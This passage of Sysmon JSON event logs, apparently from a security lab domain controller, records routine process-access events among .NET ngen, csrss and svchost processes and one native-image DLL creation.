C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.589","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-0010DDA30C00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6625,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.589\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-0010DDA30C00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.589","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-0010DDA30C00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6626,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.589\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-0010DDA30C00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.589","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-0010DDA30C00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6627,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.620\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00105BA70C00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.620","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00105BA70C00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6628,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.620\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00105BA70C00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.620","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00105BA70C00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6629,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.636\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-00105BA70C00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.636","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-00105BA70C00}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6630,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:18.808\r\nProcessGuid: {A837DB8D-047A-5F25-0000-00105BA70C00}\r\nProcessId: 3788\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ecc-0\\Microsoft.GroupPolicy.Management.dll\r\nCreationUtcTime: 2020-08-01 05:58:18.808","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:18.808","ProcessGuid":"{A837DB8D-047A-5F25-0000-00105BA70C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ecc-0\\Microsoft.GroupPolicy.Management.dll","CreationUtcTime":"2020-08-01 05:58:18.808","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6631,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.823\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-001009AB0C00}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.823","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-001009AB0C00}","TargetProcessId":"3868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6632,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.823\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-001009AB0C00}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.823","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-001009AB0C00}","TargetProcessId":"3868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
